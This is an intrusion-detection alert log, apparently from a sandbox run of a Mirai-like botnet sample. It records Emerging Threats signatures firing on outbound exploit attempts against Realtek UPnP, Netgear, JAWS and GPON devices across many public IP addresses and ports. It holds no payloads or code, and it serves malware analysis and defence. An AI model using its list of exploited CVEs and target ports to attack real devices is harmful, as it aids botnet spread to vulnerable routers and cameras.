                                                                  2024-11-28T07:28:52.550230+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353836165.78.188.577574TCP
                                                                  2024-11-28T07:28:52.562638+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2346634133.74.160.16552869TCP
                                                                  2024-11-28T07:28:52.570782+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343014187.247.135.3852869TCP
                                                                  2024-11-28T07:28:52.586761+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358350159.209.117.21680TCP
                                                                  2024-11-28T07:28:52.586761+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358350159.209.117.21680TCP
                                                                  2024-11-28T07:28:52.596372+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352776199.231.185.5249152TCP
                                                                  2024-11-28T07:28:53.512108+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235450463.141.154.2528080TCP
                                                                  2024-11-28T07:28:53.520880+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234840427.90.100.16452869TCP
                                                                  2024-11-28T07:28:53.526321+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349056133.48.250.9052869TCP
                                                                  2024-11-28T07:28:53.527429+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342862193.56.195.35555TCP
                                                                  2024-11-28T07:28:53.531115+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335316166.239.65.818080TCP
                                                                  2024-11-28T07:28:53.532605+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234917261.157.149.1188080TCP
                                                                  2024-11-28T07:28:53.534446+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348866101.203.138.4552869TCP
                                                                  2024-11-28T07:28:53.535181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355176173.109.36.2235555TCP
                                                                  2024-11-28T07:28:53.535562+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360138156.139.150.11580TCP
                                                                  2024-11-28T07:28:53.546560+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233544847.226.143.16280TCP
                                                                  2024-11-28T07:28:53.562267+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235008061.52.194.2338080TCP
                                                                  2024-11-28T07:28:53.581226+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336844196.241.64.2235555TCP
                                                                  2024-11-28T07:28:53.588134+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359186203.55.84.1008080TCP
                                                                  2024-11-28T07:28:53.601318+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352540142.227.211.16480TCP
                                                                  2024-11-28T07:28:53.606799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234858043.138.13.595555TCP
                                                                  2024-11-28T07:28:53.737232+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333030185.111.88.12780TCP
                                                                  2024-11-28T07:28:53.799415+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342938191.222.250.18480TCP
                                                                  2024-11-28T07:28:53.815097+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354856202.215.182.21980TCP
                                                                  2024-11-28T07:28:53.846403+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335458125.168.142.9680TCP
                                                                  2024-11-28T07:28:54.423349+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341994182.176.99.268080TCP
                                                                  2024-11-28T07:28:54.506607+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344284111.66.217.9952869TCP
                                                                  2024-11-28T07:28:54.520005+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23565688.169.9.1367574TCP
                                                                  2024-11-28T07:28:54.539355+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359082189.96.186.1018080TCP
                                                                  2024-11-28T07:28:54.557927+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360970132.235.32.535555TCP
                                                                  2024-11-28T07:28:54.559757+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358140143.80.92.3780TCP
                                                                  2024-11-28T07:28:54.559757+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358140143.80.92.3780TCP
                                                                  2024-11-28T07:28:54.560133+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356124125.3.202.545555TCP
                                                                  2024-11-28T07:28:54.567836+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342338204.136.100.10852869TCP
                                                                  2024-11-28T07:28:54.569430+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235411822.231.22.1227574TCP
                                                                  2024-11-28T07:28:54.573370+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233895264.200.234.19552869TCP
                                                                  2024-11-28T07:28:54.582636+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234247836.196.135.2358080TCP
                                                                  2024-11-28T07:28:54.591281+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348022145.44.151.2437574TCP
                                                                  2024-11-28T07:28:54.600602+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234951240.167.252.1865555TCP
                                                                  2024-11-28T07:28:54.612641+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341590124.211.152.1549152TCP
                                                                  2024-11-28T07:28:54.705744+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355096134.181.180.828080TCP
                                                                  2024-11-28T07:28:54.721642+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334662120.74.8.1580TCP
                                                                  2024-11-28T07:28:55.243263+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342992218.237.39.877574TCP
                                                                  2024-11-28T07:28:55.505373+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347254170.189.236.3980TCP
                                                                  2024-11-28T07:28:55.505373+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347254170.189.236.3980TCP
                                                                  2024-11-28T07:28:55.510451+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23415544.178.55.7180TCP
                                                                  2024-11-28T07:28:55.512991+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234424051.93.70.19780TCP
                                                                  2024-11-28T07:28:55.513360+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336786168.241.230.88080TCP
                                                                  2024-11-28T07:28:55.514464+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359722172.158.193.2268080TCP
                                                                  2024-11-28T07:28:55.524626+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359732147.111.155.649152TCP
                                                                  2024-11-28T07:28:55.526093+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333198115.246.201.15549152TCP
                                                                  2024-11-28T07:28:55.526468+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343632220.171.241.16452869TCP
                                                                  2024-11-28T07:28:55.548323+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348258183.208.109.25380TCP
                                                                  2024-11-28T07:28:55.562930+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355080180.113.118.2137574TCP
                                                                  2024-11-28T07:28:55.566548+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234177840.164.246.1617574TCP
                                                                  2024-11-28T07:28:55.577093+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359866211.138.21.1980TCP
                                                                  2024-11-28T07:28:55.577093+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359866211.138.21.1980TCP
                                                                  2024-11-28T07:28:55.584752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341926171.169.146.1578080TCP
                                                                  2024-11-28T07:28:55.588397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349574140.158.65.1998080TCP
                                                                  2024-11-28T07:28:55.598049+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235476429.239.31.16180TCP
                                                                  2024-11-28T07:28:55.598049+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235476429.239.31.16180TCP
                                                                  2024-11-28T07:28:55.606082+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345630183.52.110.3449152TCP
                                                                  2024-11-28T07:28:56.513090+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349176125.200.222.10149152TCP
                                                                  2024-11-28T07:28:56.523677+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234495431.231.192.6180TCP
                                                                  2024-11-28T07:28:56.523677+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234495431.231.192.6180TCP
                                                                  2024-11-28T07:28:56.539375+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234185286.150.230.14180TCP
                                                                  2024-11-28T07:28:56.572793+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235397614.51.67.1657574TCP
                                                                  2024-11-28T07:28:56.577246+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342638135.158.93.9149152TCP
                                                                  2024-11-28T07:28:56.579514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341808175.147.95.2780TCP
                                                                  2024-11-28T07:28:56.585101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338508115.145.51.1967574TCP
                                                                  2024-11-28T07:28:56.585498+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2340282174.128.4.19352869TCP
                                                                  2024-11-28T07:28:56.585896+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235502230.218.46.13452869TCP
                                                                  2024-11-28T07:28:56.586276+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344526174.144.195.8780TCP
                                                                  2024-11-28T07:28:56.587058+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354544100.223.244.1180TCP
                                                                  2024-11-28T07:28:56.587448+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233706426.125.153.652869TCP
                                                                  2024-11-28T07:28:56.588218+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2359182218.211.40.1952869TCP
                                                                  2024-11-28T07:28:56.596945+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235654067.86.61.2080TCP
                                                                  2024-11-28T07:28:56.597338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234319620.189.75.25249152TCP
                                                                  2024-11-28T07:28:56.597734+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235421065.121.9.19652869TCP
                                                                  2024-11-28T07:28:56.598148+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341222176.37.130.580TCP
                                                                  2024-11-28T07:28:56.598148+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341222176.37.130.580TCP
                                                                  2024-11-28T07:28:56.598553+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332792135.114.48.838080TCP
                                                                  2024-11-28T07:28:56.599310+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235539083.115.151.787574TCP
                                                                  2024-11-28T07:28:56.791046+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233938672.224.33.25180TCP
                                                                  2024-11-28T07:28:57.501565+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233577468.59.165.167574TCP
                                                                  2024-11-28T07:28:57.504106+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234534858.171.37.187574TCP
                                                                  2024-11-28T07:28:57.508855+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234539456.79.248.1388080TCP
                                                                  2024-11-28T07:28:57.532845+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335010138.63.57.1678080TCP
                                                                  2024-11-28T07:28:57.582123+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233617083.87.249.138080TCP
                                                                  2024-11-28T07:28:57.609809+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235334860.219.84.9880TCP
                                                                  2024-11-28T07:28:57.665367+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235055089.195.203.1628080TCP
                                                                  2024-11-28T07:28:57.665587+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23443107.197.38.11480TCP
                                                                  2024-11-28T07:28:57.665671+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359058214.55.27.2518080TCP
                                                                  2024-11-28T07:28:57.743585+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2332836132.49.66.1578080TCP
                                                                  2024-11-28T07:28:58.338974+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345816175.214.251.1465555TCP
                                                                  2024-11-28T07:28:58.521479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233591217.27.221.17574TCP
                                                                  2024-11-28T07:28:58.543147+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234783854.119.208.6580TCP
                                                                  2024-11-28T07:28:58.543907+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233869080.152.5.1880TCP
                                                                  2024-11-28T07:28:58.565488+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358724142.106.108.6752869TCP
                                                                  2024-11-28T07:28:58.590168+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349244102.225.249.9049152TCP
                                                                  2024-11-28T07:28:58.604363+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353030178.30.221.8049152TCP
                                                                  2024-11-28T07:28:58.727918+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343916222.208.184.5080TCP
                                                                  2024-11-28T07:28:58.815360+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234208685.251.156.1358080TCP
                                                                  2024-11-28T07:28:59.221679+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235584015.190.124.5680TCP
                                                                  2024-11-28T07:28:59.512085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235279416.185.70.748080TCP
                                                                  2024-11-28T07:28:59.514817+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353128113.238.60.1215555TCP
                                                                  2024-11-28T07:28:59.515217+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340770187.128.167.1857574TCP
                                                                  2024-11-28T07:28:59.517566+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338230118.209.168.118080TCP
                                                                  2024-11-28T07:28:59.523396+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338976196.163.226.8649152TCP
                                                                  2024-11-28T07:28:59.570627+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235325072.23.44.1345555TCP
                                                                  2024-11-28T07:28:59.572102+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358134179.253.217.21852869TCP
                                                                  2024-11-28T07:28:59.604975+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349478163.150.75.778080TCP
                                                                  2024-11-28T07:28:59.606587+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234961249.191.213.8552869TCP
                                                                  2024-11-28T07:28:59.607011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234001073.187.21.11380TCP
                                                                  2024-11-28T07:28:59.992394+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235544273.29.227.1780TCP
                                                                  2024-11-28T07:29:00.508147+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23597888.66.52.2108080TCP
                                                                  2024-11-28T07:29:00.514391+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236015274.19.91.855555TCP
                                                                  2024-11-28T07:29:00.537421+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23440346.189.246.3180TCP
                                                                  2024-11-28T07:29:00.544013+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23424161.125.226.17452869TCP
                                                                  2024-11-28T07:29:00.550567+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235579818.99.224.1080TCP
                                                                  2024-11-28T07:29:00.555685+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337988120.175.236.3880TCP
                                                                  2024-11-28T07:29:00.555685+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337988120.175.236.3880TCP
                                                                  2024-11-28T07:29:00.566660+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332942118.193.197.23549152TCP
                                                                  2024-11-28T07:29:00.577973+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235441228.166.132.1047574TCP
                                                                  2024-11-28T07:29:00.587056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235857630.70.91.178080TCP
                                                                  2024-11-28T07:29:00.591023+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350314134.97.14.3449152TCP
                                                                  2024-11-28T07:29:00.607211+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360452182.147.12.937574TCP
                                                                  2024-11-28T07:29:00.706149+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346224135.53.13.2118080TCP
                                                                  2024-11-28T07:29:00.712376+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234747692.139.107.12580TCP
                                                                  2024-11-28T07:29:01.504503+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359514189.71.235.11180TCP
                                                                  2024-11-28T07:29:01.535513+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357976115.35.224.298080TCP
                                                                  2024-11-28T07:29:01.544509+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340932135.197.45.1205555TCP
                                                                  2024-11-28T07:29:01.545315+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347522168.216.177.23680TCP
                                                                  2024-11-28T07:29:01.548010+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234857637.176.230.2380TCP
                                                                  2024-11-28T07:29:01.569841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233753214.147.224.2949152TCP
                                                                  2024-11-28T07:29:01.575885+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334394200.218.252.2449152TCP
                                                                  2024-11-28T07:29:01.598071+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2350190186.191.62.14652869TCP
                                                                  2024-11-28T07:29:01.611610+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234819617.117.57.16780TCP
                                                                  2024-11-28T07:29:01.619419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342270142.53.132.21549152TCP
                                                                  2024-11-28T07:29:01.774893+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23514709.158.147.2398080TCP
                                                                  2024-11-28T07:29:01.799625+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234987291.224.230.6680TCP
                                                                  2024-11-28T07:29:02.502841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359306120.90.51.1157574TCP
                                                                  2024-11-28T07:29:02.514222+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234671857.18.210.1825555TCP
                                                                  2024-11-28T07:29:02.530841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352754176.1.96.11780TCP
                                                                  2024-11-28T07:29:02.530841+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352754176.1.96.11780TCP
                                                                  2024-11-28T07:29:02.543768+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234810455.105.12.3752869TCP
                                                                  2024-11-28T07:29:02.552581+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355782215.195.170.10380TCP
                                                                  2024-11-28T07:29:02.565431+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234127263.30.95.1607574TCP
                                                                  2024-11-28T07:29:02.568369+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23427028.196.111.677574TCP
                                                                  2024-11-28T07:29:02.584200+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347906205.169.229.1997574TCP
                                                                  2024-11-28T07:29:02.589368+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341182106.218.209.5780TCP
                                                                  2024-11-28T07:29:02.589368+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341182106.218.209.5780TCP
                                                                  2024-11-28T07:29:02.598535+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235045470.228.92.21252869TCP
                                                                  2024-11-28T07:29:02.602979+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359192150.4.137.1487574TCP
                                                                  2024-11-28T07:29:02.768350+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333090162.29.10.118080TCP
                                                                  2024-11-28T07:29:02.784158+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348922107.51.18.1688080TCP
                                                                  2024-11-28T07:29:03.415666+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348890157.184.78.7380TCP
                                                                  2024-11-28T07:29:03.525015+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349696119.179.80.1578080TCP
                                                                  2024-11-28T07:29:03.542169+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234929020.14.91.2378080TCP
                                                                  2024-11-28T07:29:03.542699+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343466108.164.78.2268080TCP
                                                                  2024-11-28T07:29:03.544678+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234034258.119.101.967574TCP
                                                                  2024-11-28T07:29:03.550153+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339928103.61.153.1208080TCP
                                                                  2024-11-28T07:29:03.555273+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349378171.191.190.11480TCP
                                                                  2024-11-28T07:29:03.555686+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346966200.6.145.22980TCP
                                                                  2024-11-28T07:29:03.555686+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346966200.6.145.22980TCP
                                                                  2024-11-28T07:29:03.558457+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337800217.160.23.2580TCP
                                                                  2024-11-28T07:29:03.576949+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234404252.188.254.767574TCP
                                                                  2024-11-28T07:29:03.582490+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23548242.199.234.24880TCP
                                                                  2024-11-28T07:29:03.582490+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23548242.199.234.24880TCP
                                                                  2024-11-28T07:29:03.596623+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233665696.87.223.2125555TCP
                                                                  2024-11-28T07:29:03.605625+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358514104.67.128.2185555TCP
                                                                  2024-11-28T07:29:03.817025+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334620191.143.159.1718080TCP
                                                                  2024-11-28T07:29:04.531514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336034104.221.2.19749152TCP
                                                                  2024-11-28T07:29:04.537270+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233782434.173.168.2480TCP
                                                                  2024-11-28T07:29:04.560337+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235367466.50.61.6180TCP
                                                                  2024-11-28T07:29:04.565729+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357798118.35.71.13880TCP
                                                                  2024-11-28T07:29:04.565729+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357798118.35.71.13880TCP
                                                                  2024-11-28T07:29:04.575916+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23589505.197.254.3580TCP
                                                                  2024-11-28T07:29:04.581845+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357404164.216.166.2480TCP
                                                                  2024-11-28T07:29:04.581845+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357404164.216.166.2480TCP
                                                                  2024-11-28T07:29:04.591173+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338832195.92.142.2749152TCP
                                                                  2024-11-28T07:29:04.595446+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235542020.244.167.11949152TCP
                                                                  2024-11-28T07:29:04.665658+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234917261.157.149.1188080TCP
                                                                  2024-11-28T07:29:04.712408+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235008061.52.194.2338080TCP
                                                                  2024-11-28T07:29:04.768525+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359186203.55.84.1008080TCP
                                                                  2024-11-28T07:29:05.501538+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356728200.166.34.1480TCP
                                                                  2024-11-28T07:29:05.506992+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339352179.153.247.1678080TCP
                                                                  2024-11-28T07:29:05.520285+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342466133.69.133.2368080TCP
                                                                  2024-11-28T07:29:05.520651+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235832033.212.219.238080TCP
